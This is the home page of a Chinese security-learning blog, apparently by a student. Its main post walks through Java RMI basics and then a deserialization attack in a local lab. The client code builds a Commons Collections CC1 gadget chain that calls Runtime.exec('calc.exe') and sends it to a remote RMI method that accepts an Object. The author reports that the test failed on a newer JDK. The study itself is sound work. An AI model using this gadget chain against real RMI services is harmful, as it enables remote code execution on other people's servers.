<!DOCTYPE html>
<html lang="zh-CN">
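<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.3.0">
<link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
<!-- Fixed: this icon href is an .svg file, so the declared MIME type is image/svg+xml (it was image/png); a type that contradicts the resource lets browsers skip the link -->
<link rel="icon" type="image/svg+xml" sizes="32x32" href="/images/%E7%8B%97%E7%8B%97.svg">
<link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
<link rel="mask-icon" href="/images/logo.svg" color="#222">
<link rel="stylesheet" href="/css/main.css">
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
<!-- Theme-wide settings exposed as the globals NexT and CONFIG; the consumers are theme scripts outside this block.
     NOTE(review): an inline script like this needs 'unsafe-inline' or a nonce/hash should a Content-Security-Policy be added to the site. -->
<script id="hexo-configurations">
var NexT = window.NexT || {};
var CONFIG = {"hostname":"example.com","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
</script>
<!-- Open Graph / Twitter card metadata for link previews -->
<meta property="og:type" content="website">
<meta property="og:title" content="GiDunPar's Blog">
<meta property="og:url" content="http://example.com/index.html">
<meta property="og:site_name" content="GiDunPar's Blog">
<meta property="og:locale" content="zh_CN">
<meta property="article:author" content="GiDunPar">
<meta name="twitter:card" content="summary">
<link rel="canonical" href="http://example.com/">
<!-- Per-page settings attached to the CONFIG object declared above (this page is the home page) -->
<script id="page-configurations">
// https://hexo.io/docs/variables.html
CONFIG.page = {
sidebar: "",
isHome : true,
isPost : false,
lang : 'zh-CN'
};
</script>
<title>GiDunPar's Blog</title>
<!-- No-JavaScript fallback: resets the opacity/offset start states of the motion-animated elements so they are shown even though no animation script runs -->
<noscript>
<style>
.use-motion .brand,
.use-motion .menu-item,
.sidebar-inner,
.use-motion .post-block,
.use-motion .pagination,
.use-motion .comments,
.use-motion .post-header,
.use-motion .post-body,
.use-motion .collection-header { opacity: initial; }
.use-motion .site-title,
.use-motion .site-subtitle {
opacity: initial;
top: initial;
}
.use-motion .logo-line-before i { left: initial; }
.use-motion .logo-line-after i { right: initial; }
</style>
</noscript>
<link rel="alternate" href="/atom.xml" title="GiDunPar's Blog" type="application/atom+xml">
</head>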
<body itemscope itemtype="http://schema.org/WebPage">
<div class="container use-motion">
<div class="headband"></div>
<header class="header" itemscope itemtype="http://schema.org/WPHeader">
<div class="header-inner"><div class="site-brand-container">
<!-- NOTE(review): the navigation toggle is a plain div carrying aria-label but no role, so it is not keyboard-focusable and the label is not announced by assistive technology; a native <button type="button"> with aria-expanded and aria-controls="menu" would be the accessible form. Left unchanged because the theme CSS/JS that style and bind .toggle are outside this file. -->
<div class="site-nav-toggle">
<div class="toggle" aria-label="切换导航栏">
<span class="toggle-line toggle-line-first"></span>
<span class="toggle-line toggle-line-middle"></span>
<span class="toggle-line toggle-line-last"></span>
</div>
</div>
<!-- Site brand: links to the root and holds the page's only h1 -->
<div class="site-meta">
<a href="/" class="brand" rel="start">
<span class="logo-line-before"><i></i></span>
<h1 class="site-title">GiDunPar's Blog</h1>
<span class="logo-line-after"><i></i></span>
</a>
</div>
<!-- Right-hand toggle is rendered empty here; presumably filled or used by theme scripts not shown in this file -->
<div class="site-nav-right">
<div class="toggle popup-trigger">
</div>
</div>
</div>
<!-- Primary navigation: plain section links; none of them marks the current page (no aria-current) -->
<nav class="site-nav">
<ul id="menu" class="main-menu menu">
<li class="menu-item menu-item-home">
<a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>
</li>
<li class="menu-item menu-item-about">
<a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>
</li>
<li class="menu-item menu-item-archives">
<a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>
</li>
</ul>
</nav>
</div>
</header>
<!-- Back-to-top control: a div (not a button) holding an arrow icon and a "0%" scroll-percentage placeholder; click handling and focusability depend on theme scripts not shown here -->
<div class="back-to-top">
<i class="fa fa-arrow-up"></i>
<span>0%</span>
</div>
<main class="main">
<div class="main-inner">
<div class="content-wrap">
<div class="content index posts-expand">
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="http://example.com/2021/12/05/JAVA%E5%AE%89%E5%85%A8%E4%B9%8BRMI%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/me.jpg">
<meta itemprop="name" content="GiDunPar">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="GiDunPar's Blog">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2021/12/05/JAVA%E5%AE%89%E5%85%A8%E4%B9%8BRMI%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" class="post-title-link" itemprop="url">JAVA安全之RMI反序列化</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2021-12-05 12:16:39 / 修改时间:16:24:22" itemprop="dateCreated datePublished" datetime="2021-12-05T12:16:39+08:00">2021-12-05</time>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<p>前几天和师傅们一起下班,聊到了<code>Fastjson</code>不出网利用,想到<code>Fastjson</code>我只是复现过能出网的<code>JdbcRowSetImpl</code>链,其它姿势还没有仔细了解过,现在补补课。</p>
<h2 id="一、RMI基础概念"><a href="#一、RMI基础概念" class="headerlink" title="一、RMI基础概念"></a>一、RMI基础概念</h2><p>在JAVA中有几个机制是用来远程调用代码的,包括<code>RMI</code>、<code>JNI</code>、<code>Jython</code>,其中<code>RMI</code>用来调用JAVA代码、<code>JNI</code>用来调用C代码、<code>Jython</code>用来调用python代码。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">RMI(Remote Method Invocation,远程方法调用)是用Java在JDK1.2中实现的,它大大增强了Java开发分布式应用的能力。</span><br></pre></td></tr></table></figure>
<p><code>RMI</code>规范可以通过<code>JRMP</code>和<code>IIOP</code>协议实现,JAVA默认使用<code>JRMP</code>协议。而在<code>Weblogic</code>中对<code>RMI</code>规范的实现使用T3协议。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">JRMP:Java Remote Message Protocol ,Java 远程消息交换协议。这是运行在Java RMI之下、TCP/IP之上的线路层协议。该协议要求服务端与客户端都为Java编写,就像HTTP协议一样,规定了客户端和服务端通信要满足的规范。</span><br></pre></td></tr></table></figure>
<h2 id="二、RMI基础运用"><a href="#二、RMI基础运用" class="headerlink" title="二、RMI基础运用"></a>二、RMI基础运用</h2><p><code>RMI</code>允许运行在一个Java虚拟机的对象调用运行在另一个Java虚拟机上的对象的方法。 这两个虚拟机可以是运行在相同计算机上的不同进程中,也可以是运行在网络上的不同计算机中。</p>
<p><code>RMI</code>的使用主要分为三部分:<code>Server</code>、<code>Client</code>、<code>Registry</code>。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Server: 提供远程的对象</span><br><span class="line">Client: 调用远程的对象</span><br><span class="line">Registry: 一个注册表,存放着远程对象的位置(ip、端口、标识符)</span><br></pre></td></tr></table></figure>
<h3 id="1、定义远程接口"><a href="#1、定义远程接口" class="headerlink" title="1、定义远程接口"></a>1、定义远程接口</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.rmi;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.rmi.Remote;</span><br><span class="line"><span class="keyword">import</span> java.rmi.RemoteException;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">interface</span> <span class="title">rmidemo</span> <span class="keyword">extends</span> <span class="title">Remote</span> </span>{</span><br><span class="line"> <span class="function"><span class="keyword">public</span> String <span class="title">hello</span><span class="params">()</span> <span class="keyword">throws</span> RemoteException</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>需要注意的是该接口需要继承<code>java.rmi.Remote</code>接口,定义该接口时需要指定为<code>public</code>,接口中声明的方法都要抛出一个<code>RemoteException</code>异常。</p>
<h3 id="2、定义远程接口实现类"><a href="#2、定义远程接口实现类" class="headerlink" title="2、定义远程接口实现类"></a>2、定义远程接口实现类</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.rmi;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.rmi.RemoteException;</span><br><span class="line"><span class="keyword">import</span> java.rmi.server.UnicastRemoteObject;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">RemoteHelloWorld</span> <span class="keyword">extends</span> <span class="title">UnicastRemoteObject</span> <span class="keyword">implements</span> <span class="title">rmidemo</span></span>{</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">protected</span> <span class="title">RemoteHelloWorld</span><span class="params">()</span> <span class="keyword">throws</span> RemoteException </span>{</span><br><span class="line"> System.out.println(<span class="string">"构造方法"</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> String <span class="title">hello</span><span class="params">()</span> <span 
class="keyword">throws</span> RemoteException </span>{</span><br><span class="line"> System.out.println(<span class="string">"hello方法被调用"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"hello,world"</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>实现类需要继承<code>UnicastRemoteObject</code>类,并实现前面定义的远程接口。</p>
<h3 id="3、服务端"><a href="#3、服务端" class="headerlink" title="3、服务端"></a>3、服务端</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.rmi;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.rmi.RemoteException;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.LocateRegistry;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.Registry;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">servet</span> </span>{</span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> RemoteException </span>{</span><br><span class="line"> rmidemo hello = <span class="keyword">new</span> RemoteHelloWorld();<span class="comment">//创建远程对象</span></span><br><span class="line"> Registry registry = LocateRegistry.createRegistry(<span class="number">1099</span>);<span class="comment">//创建注册表</span></span><br><span class="line"> registry.rebind(<span class="string">"hello"</span>,hello);<span class="comment">//将远程对象注册到注册表里面,并且设置值为hello</span></span><br><span class="line"></span><br><span class="line"> }</span><br><span 
class="line">}</span><br></pre></td></tr></table></figure>
<p>服务端创建一个注册表,并将要远程调用的对象注册到注册表里。</p>
<h3 id="4、客户端"><a href="#4、客户端" class="headerlink" title="4、客户端"></a>4、客户端</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.rmi.rmiclient;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> com.rmi.RemoteHelloWorld;</span><br><span class="line"><span class="keyword">import</span> com.rmi.rmidemo;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.rmi.NotBoundException;</span><br><span class="line"><span class="keyword">import</span> java.rmi.Remote;</span><br><span class="line"><span class="keyword">import</span> java.rmi.RemoteException;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.LocateRegistry;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.Registry;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">clientdemo</span> </span>{</span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] 
args)</span> <span class="keyword">throws</span> RemoteException, NotBoundException </span>{</span><br><span class="line"> Registry registry = LocateRegistry.getRegistry(<span class="string">"localhost"</span>, <span class="number">1099</span>);<span class="comment">//获取远程主机对象</span></span><br><span class="line"> <span class="comment">// 利用注册表的代理去查询远程注册表中名为hello的对象</span></span><br><span class="line"> rmidemo hello = (rmidemo) registry.lookup(<span class="string">"hello"</span>);</span><br><span class="line"> <span class="comment">// 调用远程方法</span></span><br><span class="line"> System.out.println(hello.hello());</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>通过<code>RMI</code>协议,获取服务端绑定到注册表的远程对象。在调用远程对象的方法时,如果传入方法的参数是序列化的数据,那么服务端就会对传入的数据进行反序列化。实际测试时,服务器先起一个<code>RMI</code>服务,客户端传入的序列化数据是用来命令执行的数据,传给服务端,此时应该能在服务端看到命令被执行了,下面尝试复现。</p>
<h2 id="三、RMI反序列化测试"><a href="#三、RMI反序列化测试" class="headerlink" title="三、RMI反序列化测试"></a>三、RMI反序列化测试</h2><h3 id="1、定义远程接口-1"><a href="#1、定义远程接口-1" class="headerlink" title="1、定义远程接口"></a>1、定义远程接口</h3><p>利用<code>RMI</code>进行反序列化攻击需要两个条件:远程方法接收<code>Object</code>类型的参数、<code>RMI</code>的服务端存在可以执行命令的利用链。因为之前学习过<code>Commons Collections</code>链,所以环境还是用的那一套。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.rmidemo;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.rmi.Remote;</span><br><span class="line"><span class="keyword">import</span> java.rmi.RemoteException;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">interface</span> <span class="title">User</span> <span class="keyword">extends</span> <span class="title">Remote</span> </span>{</span><br><span class="line"> <span class="function"><span class="keyword">public</span> String <span class="title">hello</span><span class="params">(String hello)</span> <span class="keyword">throws</span> RemoteException</span>;</span><br><span class="line"> <span class="function"><span class="keyword">void</span> <span class="title">work</span><span class="params">(Object obj)</span> <span class="keyword">throws</span> RemoteException</span>;</span><br><span class="line"> <span class="function"><span class="keyword">void</span> <span class="title">say</span><span class="params">()</span> <span class="keyword">throws</span> RemoteException</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>其中我们要调用<code>work</code>方法,传入一个序列化的<code>object</code>参数。</p>
<p><img src="../images2/1.png" alt="image-20211205005117547"></p>
<h3 id="2、定义远程接口实现类-1"><a href="#2、定义远程接口实现类-1" class="headerlink" title="2、定义远程接口实现类"></a>2、定义远程接口实现类</h3><p>这个实现类不用完成什么,就把接口里的函数定义一下,输出一行作测试用。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.rmidemo;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.rmi.RemoteException;</span><br><span class="line"><span class="keyword">import</span> java.rmi.server.RMIClientSocketFactory;</span><br><span class="line"><span class="keyword">import</span> java.rmi.server.RMIServerSocketFactory;</span><br><span class="line"><span class="keyword">import</span> java.rmi.server.UnicastRemoteObject;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">UserImpl</span> <span class="keyword">extends</span> <span class="title">UnicastRemoteObject</span> <span class="keyword">implements</span> <span class="title">User</span> </span>{</span><br><span class="line"> <span class="function"><span 
class="keyword">protected</span> <span class="title">UserImpl</span><span class="params">()</span> <span class="keyword">throws</span> RemoteException </span>{</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">protected</span> <span class="title">UserImpl</span><span class="params">(<span class="keyword">int</span> port)</span> <span class="keyword">throws</span> RemoteException </span>{</span><br><span class="line"> <span class="keyword">super</span>(port);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">protected</span> <span class="title">UserImpl</span><span class="params">(<span class="keyword">int</span> port, RMIClientSocketFactory csf, RMIServerSocketFactory ssf)</span> <span class="keyword">throws</span> RemoteException </span>{</span><br><span class="line"> <span class="keyword">super</span>(port, csf, ssf);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> String <span class="title">hello</span><span class="params">(String hello)</span> <span class="keyword">throws</span> RemoteException </span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"hello"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">work</span><span class="params">(Object obj)</span> <span class="keyword">throws</span> RemoteException </span>{</span><br><span class="line"> System.out.println(<span class="string">"work被调用了"</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> 
<span class="title">say</span><span class="params">()</span> <span class="keyword">throws</span> RemoteException </span>{</span><br><span class="line"> System.out.println(<span class="string">"say"</span>);</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>在函数里输出一行文字,代表函数被执行了。</p>
<p><img src="../images2/2.png" alt="image-20211205005404483"></p>
<h3 id="3、服务端-1"><a href="#3、服务端-1" class="headerlink" title="3、服务端"></a>3、服务端</h3><p>服务端起一个<code>RMI</code>服务,并将远程对象绑定到注册表中</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.rmidemo;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.rmi.RemoteException;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.LocateRegistry;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.Registry;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">server</span> </span>{</span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> RemoteException </span>{</span><br><span class="line"> User user = <span class="keyword">new</span> UserImpl();</span><br><span class="line"> Registry registry = LocateRegistry.createRegistry(<span class="number">1099</span>);</span><br><span class="line"> registry.rebind(<span class="string">"user"</span>,user);</span><br><span class="line"> System.out.println(<span class="string">"rmi running...."</span>);</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><img src="../images2/3.png" alt="image-20211205005634019"></p>
<h3 id="4、客户端-1"><a href="#4、客户端-1" class="headerlink" title="4、客户端"></a>4、客户端</h3><p>客户端要传一个序列化的数据,为了测试方便,我们直接在客户端代码里写一个序列化的函数,返回一个<code>Object</code>类型的序列化数据进行传参。具体应该序列化哪个类,要看服务端的哪个依赖是可以反序列化命令执行的,这里因为本地测试,服务端用的就是<code>Commons Collections3.1</code>的库,所以客户端传的数据就是按照CC1链构造的。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.rmidemo;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.Transformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br><span class="line"><span 
class="keyword">import</span> org.apache.commons.collections.map.TransformedMap;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.lang.annotation.Retention;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Constructor;</span><br><span class="line"><span class="keyword">import</span> java.rmi.Naming;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">client</span> </span>{</span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>{</span><br><span class="line"> String url = <span class="string">"rmi://192.168.195.128:1099/user"</span>;</span><br><span class="line"> User userClient = (User) Naming.lookup(url);</span><br><span class="line"> userClient.work(getpayload());</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> Object <span class="title">getpayload</span><span class="params">()</span> <span class="keyword">throws</span> Exception</span>{</span><br><span class="line"> Transformer[] transformers = <span class="keyword">new</span> Transformer[]{</span><br><span class="line"> <span class="keyword">new</span> ConstantTransformer(Runtime.class),</span><br><span class="line"> <span class="keyword">new</span> InvokerTransformer(<span class="string">"getMethod"</span>, <span class="keyword">new</span> Class[]{String.class, Class[].class}, <span 
class="keyword">new</span> Object[]{<span class="string">"getRuntime"</span>, <span class="keyword">new</span> Class[<span class="number">0</span>]}),</span><br><span class="line"> <span class="keyword">new</span> InvokerTransformer(<span class="string">"invoke"</span>, <span class="keyword">new</span> Class[]{Object.class, Object[].class}, <span class="keyword">new</span> Object[]{<span class="keyword">null</span>, <span class="keyword">new</span> Object[<span class="number">0</span>]}),</span><br><span class="line"> <span class="keyword">new</span> InvokerTransformer(<span class="string">"exec"</span>, <span class="keyword">new</span> Class[]{String.class}, <span class="keyword">new</span> Object[]{<span class="string">"calc.exe"</span>})</span><br><span class="line"> };</span><br><span class="line"> Transformer transformerChain = <span class="keyword">new</span> ChainedTransformer(transformers);</span><br><span class="line"> Map map = <span class="keyword">new</span> HashMap();</span><br><span class="line"> map.put(<span class="string">"value"</span>, <span class="string">"sijidou"</span>);</span><br><span class="line"> Map transformedMap = TransformedMap.decorate(map, <span class="keyword">null</span>, transformerChain);</span><br><span class="line"></span><br><span class="line"> Class cl = Class.forName(<span class="string">"sun.reflect.annotation.AnnotationInvocationHandler"</span>);</span><br><span class="line"> Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);</span><br><span class="line"> ctor.setAccessible(<span class="keyword">true</span>);</span><br><span class="line"> Object instance = ctor.newInstance(Retention.class, transformedMap);</span><br><span class="line"> <span class="keyword">return</span> instance;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>具体这个序列化数据的构造可以看上一篇文章。</p>
<p><img src="../images2/4.png" alt="image-20211205010510493"></p>
<p>现在服务端先起一个<code>RMI</code>服务,并注册对象</p>
<p><img src="../images2/5.png" alt="image-20211205010822030"></p>
<p>然后客户端也执行,按理说是要弹出一个计算器的,但是这没弹出来,可以看到用的是<code>AnnotationInvocationHandler</code>的<code>ReadObject</code>到<code>TransformedMap</code>的<code>setValue</code>,这里序列化没有问题,但是由于JAVA版本限制,高版本JAVA里已经去掉了<code>AnnotationInvocationHandler</code>里<code>TransformedMap</code>的<code>setValue</code>了,具体上一篇文章也介绍了,因为也是测试,懒得再搭了,知道为啥就行。</p>
<p><img src="../images2/6.png" alt="image-20211205010957035"></p>
<h2 id="四、总结"><a href="#四、总结" class="headerlink" title="四、总结"></a>四、总结</h2><p>现在对这个<code>RMI</code>的利用有点迷糊,不知道具体攻击场景是什么,如果服务端是自己起的<code>RMI</code>,那么控制客户端传序列化数据时候,反序列化的也是服务端,这有啥用?自己打自己?或者说用受害者的<code>RMI</code>服务?没见过具体场景,不太清楚,不过只是为<code>Fastjson</code>做铺垫,就不继续深入了,以后有机会遇到,再来续一篇。</p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="http://example.com/2021/11/03/JAVA%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8ECommonsCollections1/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/me.jpg">
<meta itemprop="name" content="GiDunPar">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="GiDunPar's Blog">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2021/11/03/JAVA%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8ECommonsCollections1/" class="post-title-link" itemprop="url">JAVA反序列化与CommonsCollections1</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2021-11-03 14:29:58 / 修改时间:15:27:39" itemprop="dateCreated datePublished" datetime="2021-11-03T14:29:58+08:00">2021-11-03</time>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<h2 id="一、反射机制"><a href="#一、反射机制" class="headerlink" title="一、反射机制"></a>一、反射机制</h2><p>我对反射的理解就是:动态地加载一个类,动态调用类中的方法。</p>
